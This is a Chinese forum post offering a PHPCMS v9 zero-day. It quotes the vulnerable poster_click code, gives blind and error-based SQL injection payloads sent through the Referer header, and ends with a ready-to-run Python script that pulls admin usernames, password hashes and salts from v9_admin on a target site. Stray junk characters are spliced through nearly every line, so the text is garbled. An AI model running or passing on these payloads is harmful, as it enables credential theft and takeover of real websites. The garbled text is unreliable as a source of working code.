有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:( f: r9 m0 Q i2 v9 l
* z2 F2 b. Q1 N/ j' J8 T问题函数\phpcms\modules\poster\index.php5 u; u, y/ K3 }4 D
9 y& @& T4 a6 {, g5 y
public function poster_click() {
& [' z* U+ X& b0 h. r$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
' Y* |. U' x4 \0 d" {- h$r = $this->db->get_one(array('id'=>$id));
1 T4 n! P$ |* l! A6 Eif (!is_array($r) && empty($r)) return false;% ^! A S% |5 o9 ~/ _- U9 e9 I
$ip_area = pc_base::load_sys_class('ip_area');
2 [( n2 a" d9 P$ x8 N+ x5 L' |# a: L7 z& R$ip = ip();
9 I" i/ o0 x( r- a% }$area = $ip_area->get($ip);
8 S5 I* k/ o5 }- H R9 P/ q$username = param::get_cookie('username') ? param::get_cookie('username') : '';3 L6 m& S2 s5 C& }; M
if($id) {
. D* d5 m% t$ \/ v( ?1 q$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
4 v: w) c9 _+ s. y) X* H$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));; s( ?% Z; f% r
}6 x2 q2 u/ B% ~4 R2 T1 J
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));! W# W( ^6 [+ q; d
$setting = string2array($r['setting']);
5 J9 y0 R7 W+ \+ zif (count($setting)==1) {1 s V3 k- l# ]7 F4 s) \* W2 D' _
$url = $setting['1']['linkurl'];
! ~8 a C- e6 u3 A1 G3 d% c} else {
3 K9 w/ z- b8 H6 B4 H$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];& v' b7 ?7 h3 |+ c2 j' p p
}1 |! r, c( ~& x5 @$ W2 T6 t3 c8 ^
header('Location: '.$url);2 G) z7 y) w5 w, S
}# f' p% D) r& k8 |% U. p
. j3 C- G1 M/ d# I( Q
' `9 a5 t6 ]5 b# ~# D
! Y# }4 C1 ?6 u6 p7 G' l- F7 l- H利用方式:
; Z% i X6 o$ ^5 H% P( K6 v1 G1 k8 H4 ]$ F! r; L9 {9 k, j
1、可以采用盲注入的手法:. p; I6 B; \- V
. g8 L* F' T: v6 Nreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#7 X6 w7 K+ a% P2 o! X3 U- Z
# ]0 h) P; n; `通过返回页面,正常与否一个个猜解密码字段。& ^6 Y h) E/ r8 Q: s
; ^6 y+ @# F* p8 F2、代码是花开写的,随手附上了:' }4 T& A# `# r" b
" R" r$ X8 m+ o+ z; V5 {* v
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
9 g0 e3 ^8 u) M& ?+ y4 v- o' r. e. n4 S% A$ A; ^* T
此方法是爆错注入手法,原理自查。9 T" n& [4 {$ b: D& g; n
- F% ]# T' ~/ B" `7 i
* F+ N7 C) N' O! x: u
1 v9 X) z8 l! c' A/ t利用程序:
( [6 d" q, F$ Z1 H G6 B* ]! i* Y# S( q
#!/usr/bin/env python
; f) j7 L6 ~7 E- y4 w9 }; iimport httplib,sys,re
- A% w6 ?# X, U' V3 Z
& i0 U- {; P9 h: M' Pdef attack():9 ^. B9 X1 I1 p. r/ | D& o
print “Code by Pax.Mac Team conqu3r!”
- l% v$ W$ X3 C* ?print “Welcome to our zone!!!”! ~* o* U, ^4 b a8 W( _! w
url=sys.argv[1]
/ p# M M8 `- U0 O! J7 epaths=sys.argv[2]
6 b- m. L n: V( econn = httplib.HTTPConnection(url)
$ J& X* t3 W) {& k" ^: Ui_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
5 p- y" i# V4 V) B7 P1 U“Accept”: “text/plain”,
: `. w# H' t- p0 u“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}. ?' h% w. m' S, a& r! J
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)9 e R8 ~( b2 P) r& I% u, W& {6 S
r1 = conn.getresponse(): _! K! }& T) C1 J1 G6 x
datas=r1.read()
' y" w' L# H0 H* J* p. T2 ydatas=re.findall(r”Duplicate entry \’\w+’”, datas)
- H& s. _; ]5 X+ N) {. `print datas[0]! z- I- Y" K: F0 `9 h/ @7 x
conn.close()
! R$ P' i" M+ l* `. q% o; Eif __name__==”__main__”:
! l* t$ U) p. e6 Q5 d: e% vif len(sys.argv)<3:
' y( R! i+ L! ^+ x: O* wprint “Code by Pax.Mac Team conqu3r”
* h( A, J0 v$ ?* G3 T# k& |. Hprint “Usgae:”
: S# u9 _& M0 i5 x6 cprint “ phpcmsattack.py www.paxmac.org /”
+ {/ e6 b. _' {" W; Zprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
' D4 ~1 G5 G7 ~7 D6 {sys.exit(1)- ?; X9 l, D+ f- c
attack()9 R7 W. b5 g: @, H8 x0 S
" {9 X1 c) `2 G: n h j5 |( I, ?5 b
|
发表于 2013-1-11 21:01:00
收藏
支持
反对